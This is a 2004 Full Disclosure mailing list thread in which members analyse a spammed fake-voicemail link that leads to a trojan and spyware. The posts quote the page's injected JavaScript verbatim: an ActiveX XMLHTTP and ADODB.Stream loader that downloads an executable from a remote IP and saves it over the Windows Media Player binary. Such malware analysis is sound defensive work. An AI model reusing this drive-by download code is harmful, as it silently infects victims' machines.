Full Disclosure mailing list archives

Re: spamming trojan?

From: joe smith <joe () joesmith homeip net>
Date: Wed, 16 Jun 2004 13:25:19 -0500

I used PE Explorer.Looks the june4.exe is some kind of spyware. It reference to anothersite "cjdra.com", possibly uploading user information there.I just started learning assembly, please pardon my lack of knowledge onreverse engineering.


J

Michael Gargiullo wrote:

On Wed, 2004-06-16 at 13:41, joe smith wrote:

The file is UPX packed and withit the file there is another "GET"pointing to "http://219.234.95.124/june4.exe";
J

Like those Chinese stacking dolls... How'd you unpack it?

Michael Gargiullo wrote:

On Wed, 2004-06-16 at 08:23, Geo. wrote:

Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)

http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)

which brings up a frames based page with one of the frames containing this

  function InjectedDuringRedirection(){

showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialo
gHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT
SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\&apos;><\/script>'";

Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.

Geo.

Here's the contents:

var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0);x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";

so whatever w_e_d.exe is...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Antivirus/Trojan/Spyware scanners DoS!, (continued)
- Antivirus/Trojan/Spyware scanners DoS! bipin gautam (Jun 13)
  - Re: Antivirus/Trojan/Spyware scanners DoS! Benjamin (Jun 13)
    - Re: Antivirus/Trojan/Spyware scanners DoS! Syke (Jun 13)
    - Re: Antivirus/Trojan/Spyware scanners DoS! npguy (Jun 13)
  - Re: Antivirus/Trojan/Spyware scanners DoS! evilninja (Jun 13)
  - RE: Antivirus/Trojan/Spyware scanners DoS! Sean Crawford (Jun 13)
  - RE: Antivirus/Trojan/Spyware scanners DoS! Aditya, ALD [Aditya Lalit Deshmukh] (Jun 13)
    - Re: Antivirus/Trojan/Spyware scanners DoS! Cory Donnelly (Jun 15)
    - spamming trojan? Geo. (Jun 16)
    - Re: spamming trojan? Michael Gargiullo (Jun 16)
    - Message not available
    - Message not available
    - Re: spamming trojan? joe smith (Jun 16)
    - Re: spamming trojan? Michael Gargiullo (Jun 16)
    - Re: spamming trojan? joe smith (Jun 16)
    - Re: spamming trojan? Aditya, ALD [ Aditya Lalit Deshmukh ] (Jun 16)
    - Re: spamming trojan? Aditya, ALD [ Aditya Lalit Deshmukh ] (Jun 17)
    - Re: spamming trojan? Paul Schmehl (Jun 16)
    - RE: Antivirus/Trojan/Spyware scanners DoS! Geo. (Jun 16)
- Re: Antivirus/Trojan/Spyware scanners DoS! Brian Anderson (Jun 13)
- Re: Antivirus/Trojan/Spyware scanners DoS! Ahmed Motaz (Jun 13)
  - Re: Antivirus/Trojan/Spyware scanners DoS! npguy (Jun 13)
    - Re: Antivirus/Trojan/Spyware scanners DoS! bipin gautam (Jun 14)

(Thread continues...)